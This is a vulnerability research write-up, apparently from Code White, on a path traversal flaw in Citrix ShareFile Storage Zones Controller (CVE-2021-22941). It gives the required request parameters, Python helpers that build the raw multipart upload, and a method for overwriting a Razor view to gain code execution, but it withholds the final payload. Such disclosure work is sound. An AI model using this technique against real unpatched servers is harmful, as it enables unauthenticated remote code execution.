Citrix ShareFile Storage Zones Controller uses a fork of the third party library NeatUpload. Versions before 5.11.20 are affected by a relative path traversal vulnerability (CTX328123/CVE-2021-22941) when processing upload requests. This can be exploited by unauthenticated users to gain Remote Code Execution.
Come and join us on a walk-through of finding and exploiting this vulnerability.
Part of our activities here at Code White is to monitor what vulnerabilities are published. These are then assessed to determine their criticality and exploitation potential. Depending on that, we inform our clients about affected systems and may also develop exploits for our offensive arsenal.
In April, Citrix published an advisory that addresses three vulnerabilities in ShareFile Storage Zones Controller (from here on just "ShareFile"). In contrast to a previous patch in the same product, there were no lightweight patches available, which could have been analysed quickly. Instead, only full installation packages were available. So, we downloaded
StorageCenter_5.11.18.msi to have a look at it.
A first glance at the files contained in the
.msi file revealed the third party library
NeatUpload.dll. We knew that the latest version contains a Padding Oracle vulnerability, and since the
NeatUpload.dll file had the same .NET file version number as ShareFile (i. e., 5.11.18), chances were that somebody had reported that very vulnerability to Citrix.
After installation of version 5.11.18 of ShareFile, attaching to the
w3wp.exe process with dnSpy and opening the
NeatUpload.dll, we noticed that the handler class
Brettle.Web.NeatUpload.UploadStateStoreHandler was missing. So, it must have either been removed by Citrix or they used an older version. Judging by the other classes in the library, the version used by ShareFile appeared to share similarities with NeatUpload 1.2 available on GitHub.
So, not a quick win after all? As we did not find a previous version of ShareFile such as 5.11.17 that we could have diffed against 5.11.18, we decided to look for something in 5.11.18 directly.
Finding A Path From Sink To Source
Since NeatUpload is a file upload handling library, our first attempts were focused around analysing its file handling. Here
FileStream was a good candidate to start with. By analysing where that class got instantiated, the first result already pointed directly to a method in NeatUpload, the
Brettle.Web.NeatUpload.UploadContext.WritePersistFile() method. Here a file gets written with something that appears to be some kind of metrics of an upload request:
By following the call hierarchy, one eventually ends up in
Brettle.Web.NeatUpload.UploadHttpModule.Init(HttpApplication), which is the initialization method of the IHttpModule interface.
That method is used to register event handlers that get called during the life cycle of an ASP.NET request. The module itself is added to the list of HTTP modules in the Web.config.
After verifying that there is a direct path from the
UploadHttpModule processing a request to a
FileStream constructor, we have to check whether the file path and contents can be controlled. Back in
UploadContext.WritePersistFile(), both the file path and contents include the
PostBackID property value. By following the call hierarchy of the assignment of the
UploadContext.postBackID field that backs that property, there is also a path originating from
FilteringWorkerRequest.ParseOrThrow(): the return value of a
FieldNameTranslator.FileFieldNameToPostBackID(string) call ends up in the assignment of that field:
The condition of that
if branch is that both
text4 and
text5 are set and that
FieldNameTranslator.FileFieldNameToPostBackID(string) returns a value. Here,
text5 originates from the
filename attribute of a
Content-Disposition multi-part header and
text4 from its
name attribute (see lines 514–517). That means, the request must be a multipart message with one part having a header like this:
Content-Disposition: form-data; name="text4"; filename="text5"
The
FieldNameTranslator.FileFieldNameToPostBackID(string) method call returns the value of the
FieldNameTranslator.PostBackID field if it is present:
By following the assignment of that
FieldNameTranslator.PostBackID field, it becomes clear that the internal constructor of
FieldNameTranslator takes it from a request query string parameter:
So, let's summarize our knowledge of the HTTP request requirements so far:
POST /default.aspx?foo HTTP/1.1
Content-Type: multipart/form-data; boundary="boundary"

--boundary
Content-Disposition: form-data; name="text4"; filename="text5"

--boundary--
The request path and query string are not yet known, so we'll simply use dummies. This works because HTTP modules are not bound to paths like HTTP handlers are.
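To experiment with such requests, it helps to assemble them from scratch rather than relying on an HTTP library's multipart encoding. Here is a minimal sketch in Python that builds the raw request derived above; the host name is a placeholder, and the field names text4/text5 are just the dummy values used throughout this walkthrough:

```python
def build_request(host: str, path: str = "/default.aspx?foo") -> bytes:
    """Assemble the raw multipart request with one part whose
    Content-Disposition header carries both a name and a filename
    attribute, as required by the parsing condition above."""
    boundary = "boundary"
    body = (
        "--" + boundary + "\r\n"
        'Content-Disposition: form-data; name="text4"; filename="text5"\r\n'
        "\r\n"
        "dummy\r\n"
        "--" + boundary + "--\r\n"
    ).encode()
    headers = (
        "POST " + path + " HTTP/1.1\r\n"
        "Host: " + host + "\r\n"
        'Content-Type: multipart/form-data; boundary="' + boundary + '"\r\n'
        "Content-Length: " + str(len(body)) + "\r\n"
        "\r\n"
    ).encode()
    return headers + body

# Placeholder host; in a lab setup this would be the ShareFile instance.
request = build_request("sharefile.example")
print(request.decode())
```

The bytes can then be sent over a plain socket, which keeps full control over the request line and headers while debugging.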
Important Checkpoints Along The Route
Let's set some breakpoints at some critical points and ensure they get reached and behave as assumed:
- UploadHttpModule.Application_BeginRequest() – to ensure the HTTP module is actually active (the BeginRequest event handler is the first in the chain of raised events)
- FieldNameTranslator..ctor() – to ensure the FieldNameTranslator.PostBackID field gets set with our value
- FilteringWorkerRequest.ParseOrThrow() – to ensure the multipart parsing works as expected
- UploadContext.set_PostBackID(string) – to ensure the UploadContext.postBackID field is set with our value
- UploadContext.WritePersistFile() – to ensure the file path and content contain our value
After sending the request, the break point at
UploadHttpModule.Application_BeginRequest() should be hit. Here we can also see that the module expects the
RawUrl to contain
upload.aspx, so let's adjust the request path accordingly and send the request again. This time the break point at the constructor of
FieldNameTranslator should be hit. Here we can see that the
PostBackID field value is taken from a query string parameter named
uploadid (which is actually configured in the Web.config):
After sending a new request with the query string
uploadid=foo, our next break point at
FilteringWorkerRequest.ParseOrThrow() should be hit. After stepping through that method, you'll notice that some additional parameters such as
accountid are expected:
Let's add them with bogus values and try it again. This time the break point at
UploadContext.WritePersistFile() should get hit where the
FileStream gets created:
So, now we have reached the
FileStream constructor but the
UploadContext.PostBackID field value is
null as it hasn't been set yet.
Are We Still On Track?
You may have noticed that the break point at
UploadContext.set_PostBackID(string) also hasn't been hit yet. This is because the
while loop in
FilteringWorkerRequest.ParseOrThrow() uses the result of
FilteringWorkerRequest.CopyUntilBoundary(string, string, string) as condition but it returns
false on its first call so the
while block never gets executed.
When looking at the code of
CopyUntilBoundary(string, string, string) (not depicted here), it appears that it fills a buffer with the posted data and only returns
true if there is more data to process than fits into the buffer. That byte array
tmpBuffer has a size of 4096 bytes, which our minimalistic example request certainly does not exceed.
After sending a multipart part that is larger than 4096 bytes, the break point at the
FileStream constructor should get hit twice: once with a
null value originating from within the
FilteringWorkerRequest.CopyUntilBoundary(string, string, string) call and once with
foo originating from within the body of ParseOrThrow() itself.
Stepping into the
FileStream constructor also shows the resulting path. While its
context directory does not exist, we're already within the document root directory, which the
w3wp.exe process user has full control of:
Let's prove this by writing a file to it using a relative path traversal in the upload ID:
We have reached our destination, we can write into the web root directory!
What's In The Backpack?
Now that we're able to write files, how can we exploit this? We have to keep in mind that the
uploadid parameter is used for both the file path and the content.
That means, the restriction is that we can only use characters that are valid in Windows file system paths. According to the naming conventions of files and paths, the following characters are not allowed:
- Characters in the range 0–31 (0x00–0x1F)
- < (less than) and > (greater than)
- : (colon)
- " (double quotation mark)
- / (forward slash) and \ (backslash)
- | (vertical bar or pipe)
- ? (question mark)
- * (asterisk)
Especially < and > are daunting, as we can't write an
.aspx web shell, which would require
<% … %> or
<script runat="server">…</script> blocks. Binary files like DLLs are also out as they require bytes in the range 0–31.
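As a quick sanity check, here is a sketch that tests whether a candidate payload survives these restrictions. The character set is taken from the Windows naming conventions cited above, not from ShareFile code:

```python
# Characters reserved in Windows file names (per the naming
# conventions), plus the control characters 0-31.
FORBIDDEN = set('<>:"/\\|?*') | {chr(c) for c in range(32)}

def survives_as_file_name(payload: str) -> bool:
    """True if every character of the payload is legal in a Windows
    file name segment, i.e. the payload could be written via the
    path-based primitive."""
    return not (set(payload) & FORBIDDEN)

print(survives_as_file_name("<% web shell %>"))    # False: '<' and '>'
print(survives_as_file_name("@plain razor text"))  # True
```

This immediately shows why classic Web Forms payloads are ruled out while Razor's @-based syntax remains in play.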
So, is that the end of this journey? At best a denial of service when overwriting existing files? Have we already tried hard enough?
Running With Razor
If you are a little more familiar with ASP.NET, you will probably know that there are not just Web Forms (i. e.,
.aspx,
.asmx, etc.) but also two other web application frameworks, one of them being MVC (model/view/controller). And while the models and controllers are compiled to binary assemblies, the views are implemented in separate
.cshtml files. These use a different syntax, the Razor Pages syntax, which uses the
@ symbol to transition from HTML to C#:
And ShareFile does not just use Web Forms but also MVC:
Note that we can't just add new views, as their rendering is driven by the corresponding controller. But we can overwrite an existing view file like
ConfigService\Views\Shared\Error.cshtml, which is accessible via the corresponding controller route:
What is still missing now is the writing of the actual payload using Razor syntax. We won't show this here, but here is a hint: unlike on Unix-based systems, Windows does not require each segment of a file path to exist, as the path gets resolved lexically. That means we can use additional "directories" to hold the payload as long as we "step out" of them again so that the resolved path still points to the right file.
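The lexical collapse can be illustrated with Python's ntpath module, which implements Windows path semantics. The payload segment and file name below are placeholders, not the actual exploit payload:

```python
import ntpath

# A made-up "directory" segment carries the payload text, and the
# following ".." steps back out of it. Windows resolves the ".."
# lexically, so the payload segment never has to exist on disk.
payload_segment = "@{ payload goes here }"  # hypothetical Razor content
raw = ntpath.join("Views", "Shared", payload_segment, "..", "Error.cshtml")

print(raw)
print(ntpath.normpath(raw))  # collapses to Views\Shared\Error.cshtml
```

The file written through such a path still contains the full upload ID, payload segment included, while the resolved path points at the target view file.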
Timeline And Fix
Code White reported the vulnerability to Citrix on May 14th. On August 25th, Citrix released ShareFile Storage Zones Controller 5.11.20, which addresses this vulnerability by validating the passed value before assigning it to the FieldNameTranslator.PostBackID field.
On September 14th, Citrix published the Security Bulletin CTX328123.